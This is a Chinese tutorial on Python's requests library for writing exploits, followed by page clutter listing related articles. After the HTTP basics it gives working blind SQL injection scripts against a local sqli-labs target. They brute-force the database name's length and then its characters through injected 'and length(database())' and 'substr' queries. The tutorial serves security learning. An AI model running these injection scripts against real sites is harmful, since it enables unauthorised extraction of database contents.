用Python编写EXP

简介: 用Python编写EXP

一、环境

1、python3

2、用到的模块requests

二、requests模块应用

1、获取网页的内容

# coding=utf-8
import requests
res=requests.get("http://192.168.1.129/html/1.html")
print(res.content.decode("utf-8"))

2、获取头信息

3、获取提交的网址

print(res.headers)
print(res.url)

运行结果:

{'Date': 'Tue, 04 Aug 2020 13:01:06 GMT', 'Server': 'Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45', 'Last-Modified': 'Sun, 31 May 2020 15:48:24 GMT', 'ETag': '"676-5a6f39bc391c0"', 'Accept-Ranges': 'bytes', 'Content-Length': '1654', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html'}

http://192.168.1.129/html/1.html

4、修改访问时UA信息

# coding=utf-8
import requests
url="http://192.168.1.129/html/1.html"
header={"User-Agent":"aiyoubucuo"}
res=requests.get(url,headers=header)
print(res.request.headers)

运行结果:

{'User-Agent': 'aiyoubucuo', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

5、超时处理,网页超过三秒没有反应当做异常

# coding=utf-8
import requests
url="http://192.168.1.129/html/chaoshi.php"

try:

res=requests.get(url,timeout=3)
    print(res.request.headers)
except Exception as e:
    print("网页已超时!!!")

6、提交get数据

# coding=utf-8
import requests
url="http://192.168.1.129/get.php"
data={"aiyou":"bucuo"}
res=requests.get(url,params=data)
print(res.url)

运行结果:

http://192.168.1.129/get.php?aiyou=bucuo

7、POST提交数据

# coding=utf-8
import requests
url="http://192.168.1.129/post.php"
datas={"aiyou":"bucuo"}
res=requests.post(url,data=datas)
print(res.content.decode("utf-8"))

运行结果:

array(1) {
  ["aiyou"]=>
  string(5) "bucuo"
}

8、上传文件

# coding=utf-8
import requests
url="http://192.168.1.129/shangchuan.php"
upfile={"file":open("123.txt","rb")}
datas={"submit":"submit"}
res=requests.post(url,files=upfile,data=datas)
print(res.content.decode("utf-8"))

运行结果:

0a2653c851af460fa595bd959398a8f1.png

三、获取数据库长度

#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=8' and (length(database())) = 8 --+
# coding=utf-8
import requests
url="http://192.168.1.129/sqli/Less-8/"
reslen=len(requests.get(url=url+"?id=1").text)
print("正常情况下网页返回数据的长度"+str(reslen))
dblen=0
while True:
    dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"
    print(dburl)
    if len(requests.get(dburl).text)==reslen:
        print("数据库名字长度为:"+str(dblen))
        break
    if dblen==30:
        print("出现错误!")
        break
    dblen+=1

运行结果:

0eacb84100b54626af849e6b562bf92a.png

四、获取数据库名字

# coding=utf-8
import string
import requests
url="http://192.168.1.129/sqli/Less-8/"
reslen=len(requests.get(url=url+"?id=1").text)
print("正常情况下网页返回数据的长度"+str(reslen))
#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=2' and (length(database())) = 8 --+
dblen=0
while True:
    dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"
    print(dburl)
    if len(requests.get(dburl).text)==reslen:
        print("数据库名字长度为:"+str(dblen))
        break
    if dblen==30:
        print("出现错误!")
        break
    dblen+=1
dbnmae=""
#生成8个字母
for i in range(1,9):
    #获取字母从a-z
    for a in string.ascii_lowercase:
        dburl=url+"?id=1'+and+substr(database(),"+str(i)+",1)="+"'"+a+"'"+"--+"
        print(dburl)
        if len(requests.get(dburl).text)==reslen:
            dbnmae+=a
            print(dbnmae)
            break

运行结果:

0eacb84100b54626af849e6b562bf92a.png

禁止非法,后果自负

目录
相关文章
|
Apache PHP 数据库
用Python编写EXP
用Python编写EXP
112 0
用Python编写EXP
|
Oracle 关系型数据库 数据库
Python远程操作Oracle实现一键备份还原数据库演示,利用socket进行imp、exp一键导入导出oracle数据库dmp文件
Python远程操作Oracle实现一键备份还原数据库演示,利用socket进行imp、exp一键导入导出oracle数据库dmp文件
317 0
Python远程操作Oracle实现一键备份还原数据库演示,利用socket进行imp、exp一键导入导出oracle数据库dmp文件
|
9天前
|
安全 Java 数据处理
Python网络编程基础(Socket编程)多线程/多进程服务器编程
【4月更文挑战第11天】在网络编程中,随着客户端数量的增加,服务器的处理能力成为了一个重要的考量因素。为了处理多个客户端的并发请求,我们通常需要采用多线程或多进程的方式。在本章中,我们将探讨多线程/多进程服务器编程的概念,并通过一个多线程服务器的示例来演示其实现。
|
9天前
|
程序员 开发者 Python
Python网络编程基础(Socket编程) 错误处理和异常处理的最佳实践
【4月更文挑战第11天】在网络编程中,错误处理和异常管理不仅是为了程序的健壮性,也是为了提供清晰的用户反馈以及优雅的故障恢复。在前面的章节中,我们讨论了如何使用`try-except`语句来处理网络错误。现在,我们将深入探讨错误处理和异常处理的最佳实践。
|
12天前
|
缓存 监控 Python
解密Python中的装饰器:优雅而强大的编程利器
Python中的装饰器是一种强大而又优雅的编程工具,它能够在不改变原有代码结构的情况下,为函数或类添加新的功能和行为。本文将深入解析Python装饰器的原理、用法和实际应用,帮助读者更好地理解和利用这一技术,提升代码的可维护性和可扩展性。
|
29天前
|
编译器 测试技术 C++
【Python 基础教程 01 全面介绍】 Python编程基础全攻略:一文掌握Python语法精髓,从C/C++ 角度学习Python的差异
【Python 基础教程 01 全面介绍】 Python编程基础全攻略:一文掌握Python语法精髓,从C/C++ 角度学习Python的差异
159 0
|
1天前
|
安全 数据处理 开发者
《Python 简易速速上手小册》第7章:高级 Python 编程(2024 最新版)
《Python 简易速速上手小册》第7章:高级 Python 编程(2024 最新版)
15 1
|
1天前
|
人工智能 数据挖掘 程序员
《Python 简易速速上手小册》第1章:Python 编程入门(2024 最新版)
《Python 简易速速上手小册》第1章:Python 编程入门(2024 最新版)
27 0
|
2天前
|
API Python
Python模块化编程:面试题深度解析
【4月更文挑战第14天】了解Python模块化编程对于构建大型项目至关重要,它涉及代码组织、复用和维护。本文深入探讨了模块、包、导入机制、命名空间和作用域等基础概念,并列举了面试中常见的模块导入混乱、不适当星号导入等问题,强调了避免循环依赖、合理使用`__init__.py`以及理解模块作用域的重要性。掌握这些知识将有助于在面试中自信应对模块化编程的相关挑战。
17 0
|
3天前
|
Python
Python金融应用编程:衍生品定价和套期保值的随机过程
Python金融应用编程:衍生品定价和套期保值的随机过程